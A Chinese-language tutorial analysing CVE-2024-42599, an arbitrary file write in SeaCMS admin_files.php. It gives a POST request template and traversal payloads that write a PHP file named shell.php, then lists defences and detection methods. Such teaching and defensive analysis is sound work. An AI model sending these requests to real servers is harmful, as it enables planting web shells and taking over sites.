SeaCMS admin_files.php CVE-2024-42599 漏洞分析与利用教学

漏洞概述

SeaCMS 是一款内容管理系统，其 admin_files.php 文件存在一个文件写入漏洞（CVE-2024-42599），允许攻击者在服务器上写入任意文件内容，可能导致远程代码执行。

漏洞分析

漏洞位置

漏洞位于 admin_files.php 文件的 saveCus 操作处理逻辑中。

漏洞原理

1. 攻击者可以通过构造特殊的 POST 请求向 admin_files.php 写入任意文件内容
2. 文件路径通过 filedir 参数控制
3. 文件内容通过 content 参数传递
4. 系统未对文件路径和内容进行充分验证，导致目录遍历和任意文件写入

关键漏洞代码

从请求中可以看到关键参数：

• action=saveCus - 触发保存操作
• content - 包含要写入的文件内容（URL编码）
• filedir - 指定写入的文件路径（包含目录遍历）

漏洞利用

利用条件

1. 攻击者需要有管理员权限或能够访问 admin_files.php
2. 服务器对目标目录有写入权限

利用步骤

1. 构造恶意 POST 请求：

POST /asro3j/admin_files.php?action=saveCus HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: [长度]

content=[恶意内容URL编码]&filedir=[目标路径]&Submit=[提交按钮文本]

2. 示例利用（写入PHP shell）：

content=%3C%3Fphp%20phpinfo%28%29%3B%20%3F%3E
filedir=../uploads/shell.php

3. 通过目录遍历写入系统关键位置：

filedir=../../../../var/www/html/shell.php

实际攻击示例

从提供的请求中可以看到攻击者尝试写入：

• 文件路径：../uploads/../asro3j/templets/admin_files.htm
• 文件内容：包含PHP代码 <?php phpinfo(); ?> 和其他HTML内容

防御措施

1. 输入验证：

   • 对 filedir 参数进行严格过滤，防止目录遍历
   • 限制可写入的目录范围

2. 权限控制：

   • 限制 admin_files.php 的访问权限
   • 设置服务器文件系统权限，限制Web用户写入

3. 代码修复：

   • 在写入文件前检查目标路径是否在允许范围内
   • 对文件内容进行安全检查

4. 更新升级：

   • 及时应用官方补丁

检测方法

1. 检查服务器日志中可疑的 admin_files.php 访问
2. 监控对 saveCus 操作的异常请求
3. 检查系统关键目录中新增的可疑文件

总结

CVE-2024-42599 是一个高危的文件写入漏洞，攻击者可以利用它上传恶意文件获取服务器控制权。系统管理员应及时修补漏洞，限制后台访问权限，并监控系统文件变化。